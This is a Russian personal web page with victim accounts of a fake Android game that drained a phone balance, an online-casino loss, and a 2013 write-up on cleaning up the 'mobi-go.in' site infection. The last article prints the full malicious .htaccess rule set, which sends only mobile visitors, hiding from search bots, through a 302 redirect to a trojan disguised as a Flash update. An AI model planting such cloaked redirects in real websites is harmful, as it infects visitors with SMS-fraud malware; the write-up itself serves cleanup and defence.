MAKSIKI have come to you

На главную | В халявные игры вставляют вирус | Интернет казино | Вирус mobi-go.in

В халявные игры вставляют вирус

Интернет-мошенники

Купил себе крутой телефон Samsung Galaxy S2. Установил кучу софта с андроид маркета (теперь гугл плей), но в большинстве там демо версии. Захотел найти игру need for speed shift. Нашел в интернете (причем очень быстро, на первых страницах) apk файл (установочный) и дополнительные файлы. Залил на телефон. Запустил установщик. Значит там мне предлагают такое, что эта программа будет управлять памятью телефона, вызовами, смс-ками и еще чем-то. Я подумал, что у если у меня стои касперский и доктор веб (тоже демки), то в крайней ситуации эти программы заблокируют игру. Но не тут-то было. После установки пришло смс сообщение с предложением перейти по ссылки (я не стал этого делать). Заглянул в баланс, а там 180 рублей приказали долго жить. Но что самое интересное установленный файл даже игры не содержал, а только программу шпион.

к началу статьи


Интернет казино

Казино

Был я в интернете на ю-тубе, произвел поиск и в начале предложенных вариантов было видео о том как разбогатеть с помощью интенет казино. Заинтересовало, зашел по ссылке. Положил деньги на счет, всего 100 руб. Начл играть как прадлагали, ставил на черное на красное - выиграл. Играл долго, в итоге на счету было 100 долларов. Хотел вывести деньги, но запрос на вывод у них обрабатывается сутки. Поэтому решил продолжить через пару часов. Только стал играть по привычной схеме как случился моментальный провал, я оказался на нуле. Сходил положил еще денег 500 рублей. Тоже просрал, теперь схема уже не работала. Это была психологическая ловушка и я в нее попался, так как пытался разгадать выигрышную схему. Итог всего: потерял 10000 рублей.
Никогда не играйте в интернет казно - оно запрограммировано на выигрыш. И Вы никогда не сможете управлять этим процессом. Запомните - КАЗИНО ВСЕГДА В ВЫИГРЫШЕ

Автор статьи: Мидрос Взадком

к началу статьи


Вирус mobi-go.in

Вирус mobi-go - это вирус, который перенаправляет пользователя с вашей страницы на сайт с размещенным вирусом. Если вы заходите на зараженный сайт (сначала на Ваш личный сайт) через компьютер, то с помощью команды
RewriteEngine on
он отсылает вас сначало например сюда: http://bit.ly/Wwpq3Q, а этот сайт ретранслирует вот сюда: http://mobi-go.in/l=32411e1e016e0b4d0356571
4564f0e5820095d450a6d

Адрес первичного редиректа могут менять гораздо чаще чем второго, с которого распространяется троян.
Вот как Яндекс говорит об этом сайте:
Сайт mobi-go.in может быть опасен для вашего компьютера
Что произошло
Яндекс обнаружил на этом сайте вредоносный программный код, который может заразить ваш компьютер вирусом или получить доступ к вашей личной информации.

Подробнее про вредоносный код

Яндекс периодически проверяет страницы сайтов. Последняя проверка (менее двух дней назад) показала, что на сайте размещён вредоносный код. Это могло произойти как по желанию владельцев сайта, так и без их ведома — в результате действий злоумышленников. Если при следующей проверке код не будет обнаружен, Яндекс перестанет размечать сайт в результатах поиска как опасный.

Вредоносный код:

обращается по адресам, которые находятся в чёрном списке Яндекса, как распространители вредоносного ПО;
содержит exploit (по данным поведенческого анализатора Яндекса);
содержит Troj/Jifake-A (по данным компании Sophos).


Как найти данный вирус в своем сайте.

Можете не пытаться найти выражение "mobi-go" с помощью функции найти, этой ссылки редиректа там нет. Можно попытаться найти "bit.ly/Wwpq3Q", но если злоумышленники используют другой сайт? Можно найти выражение: "Rewrite" или "Redirect", но если вы сами пользуетесь этими командами и их достаточно много?
Предлагаю рассуждать логически. В каком-то (это лучший случай) или в каких-то файлах расположен код перенаправления на страницу злоумышленников. Метод математического приближения, отрабатываем на практике. Надо со своего сайта сначало удалить группу файлов, затем через браузер зайти на свой сайт, и если перенаправление на сайт злоумышленников отсутствует, значит в этих удаленных файлах и сидит вирус. В противном случае, далее удаляем следущюю группу файлов и опять проверяем в браузере, и так возможно до последнего оставшегося файла.
Если после удаления в группе файлов обнаружился вирус (другими словами ваш личный сайт стал нормально работать), то последовательно загружаем на свой сайт по одному файлу из этой группы. Вот и всё, после того как определенный файл будет загружен на ваш личный сайт и редирект на вирус возобновиться, значит в этом файле вирус и мы продолжаем ковыряться внутри этого конкретного файла.

В моём случае, если входить на сайт через компьютер, то всё в норме, если входить на сайт через смартфон, то вирус автоматически загружает на ваш девайс Flash Player (якобы ваш Adobe Flash Player устарел и требуется обновить его), но это не Flash Player, а программа отсылающая платные СМС сообщения.
Вирус находился в файле ".htaccess". Вот что было внутри:
#code starts
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]
RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} audi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} aste [NC,OR]
RewriteCond %{HTTP_USER_AGENT} avan [NC,OR]
RewriteCond %{HTTP_USER_AGENT} benq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} bird [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blac [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR]
RewriteCond %{HTTP_USER_AGENT} brew [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cell [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dang [NC,OR]
RewriteCond %{HTTP_USER_AGENT} doco [NC,OR]
RewriteCond %{HTTP_USER_AGENT} eric [NC,OR]
RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} inno [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} java [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} keji [NC,OR]
RewriteCond %{HTTP_USER_AGENT} leno [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} maui [NC,OR]
RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mits [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mmef [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mobi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mot- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} moto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mwbp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nec- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} newt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} noki [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opwv [NC,OR]
RewriteCond %{HTTP_USER_AGENT} palm [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pana [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pant [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pdxg [NC,OR]
RewriteCond %{HTTP_USER_AGENT} phil [NC,OR]
RewriteCond %{HTTP_USER_AGENT} play [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pluc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} port [NC,OR]
RewriteCond %{HTTP_USER_AGENT} prox [NC,OR]
RewriteCond %{HTTP_USER_AGENT} qtek [NC,OR]
RewriteCond %{HTTP_USER_AGENT} qwap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sage [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sams [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sany [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sch- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sec- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} send [NC,OR]
RewriteCond %{HTTP_USER_AGENT} seri [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sgh- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} shar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sie- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} siem [NC,OR]
RewriteCond %{HTTP_USER_AGENT} smal [NC,OR]
RewriteCond %{HTTP_USER_AGENT} smar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sony [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sph- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} symb [NC,OR]
RewriteCond %{HTTP_USER_AGENT} t-mo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} teli [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tim- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tosh [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tsm- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} upg1 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} upsi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} vk-v [NC,OR]
RewriteCond %{HTTP_USER_AGENT} voda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} w3cs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wap- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapa [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapr [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xda- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} up.browser [NC,OR]
RewriteCond %{HTTP_USER_AGENT} up.link [NC,OR]
RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mmp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR]
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} phone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipad [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPad [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPhone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipod [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPod [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Moby [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Mobi [NC,OR]
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml
|application/vnd.wap.xhtml+xml" [NC,OR] RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC] RewriteCond %{HTTP_USER_AGENT} !bsd [NC] RewriteCond %{HTTP_USER_AGENT} !x11 [NC] RewriteCond %{HTTP_USER_AGENT} !unix [NC] RewriteCond %{HTTP_USER_AGENT} !macos [NC] RewriteCond %{HTTP_USER_AGENT} !macintosh [NC] RewriteCond %{HTTP_USER_AGENT} !playstation [NC] RewriteCond %{HTTP_USER_AGENT} !google [NC] RewriteCond %{HTTP_USER_AGENT} !yandex [NC] RewriteCond %{HTTP_USER_AGENT} !bot [NC] RewriteCond %{HTTP_USER_AGENT} !libwww [NC] RewriteCond %{HTTP_USER_AGENT} !msn [NC] RewriteCond %{HTTP_USER_AGENT} !america [NC] RewriteCond %{HTTP_USER_AGENT} !avant [NC] RewriteCond %{HTTP_USER_AGENT} !download [NC] RewriteCond %{HTTP_USER_AGENT} !fdm [NC] RewriteCond %{HTTP_USER_AGENT} !maui [NC] RewriteCond %{HTTP_USER_AGENT} !webmoney [NC] RewriteCond %{HTTP_USER_AGENT}
!windows-media-player [NC] RewriteRule ^(.*)$ http://bit.ly/Wwpq3Q
[L,R=302]

Удачи,
Автор статьи: Дроздов Максим 30.03.2013г.

к началу статьи


Комментарии

Добавить комментарий



Яндекс.Метрика 10
© Все права защищены. Распространение и копирование запрещено. Разработано Maksimus. 2011г.